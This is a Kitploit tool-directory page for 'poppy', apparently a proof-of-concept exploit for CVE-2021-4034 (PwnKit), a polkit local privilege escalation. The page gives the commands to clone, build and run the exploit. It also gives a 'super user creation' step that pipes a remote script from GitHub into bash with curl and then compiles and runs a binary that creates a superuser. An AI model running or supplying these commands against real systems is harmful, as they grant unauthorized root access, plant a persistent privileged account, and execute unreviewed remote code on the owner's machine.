Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
poppy — CVE-2021-4034 PoC , polkit < 0.131 | Kitploit
Tools/GitHubGitHub/tahaafarooq/poppy
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingPayload Development
GitHubtahaafarooq/poppy

poppy

CVE-2021-4034 PoC , polkit < 0.131

View Repository
413 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

poppy : CVE-2021-4034

CVE-2021-4034 PoC , polkit < 0.131

Usage

Tested on Arch Linux (Manjaro & Axyl OS)

root@kitploit:~
git clone https://github.com/tahaafarooq/poppy
make
./poppy

Super user creation exploit

root@kitploit:~
bash -c "$(curl -fsSL https://raw.githubusercontent.com/tahaafarooq/poppy/main/suuser.sh)"
root@kitploit:~
gcc -shared su.c -o suuser -Wl,-e,entry -fPIC
./suuser

POC

anotherone

For more information about this vulnerability refer to the writeup https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt

Download Tool